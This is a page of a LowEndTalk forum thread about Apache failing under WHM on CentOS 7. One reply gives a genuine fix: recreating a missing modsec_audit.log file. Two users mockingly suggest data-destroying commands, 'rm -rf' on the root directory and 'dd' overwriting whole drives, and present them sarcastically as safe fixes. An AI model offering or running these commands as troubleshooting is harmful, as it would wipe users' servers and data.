Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


Apache is not working in WHM centos 7 - Page 2
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Apache is not working in WHM centos 7

2»

Comments

  • i fixed this with this way.
    /etc/apache2/logs/modsec_audit.log

    Logs folder was not there i created empty log folder and and created this file and restarted the apache . this was fixed.

  • Thread continues here...

    Thanked by 1WebProject
  • WebProjectWebProject Host Rep, Veteran
    edited November 2017

    zafouhar said: Ok take a deep breath.

    Then type in your SSH the following:

    cd / && rm -rf *

    Press Enter

    Wait until the command completes.

    if you recommend that commands, I do recommend better one:

    dd if=/dev/zero of=/dev/sdX bs=1M *replace X with the target drive letter.


    or


    dd if=/dev/urandom of=/dev/sdX bs=1M *replace X with the target drive letter.


    and Enter (no confirmation or any BS will be prompt)

    as above commands safely remove any issues on drives, half way though you will completely loose connection to SSH, you need to wait additionally 30-60 mins depends on hard drive size and you can safely dispose your server or VPS account as all data will be wiped out.

Sign In or Register to comment.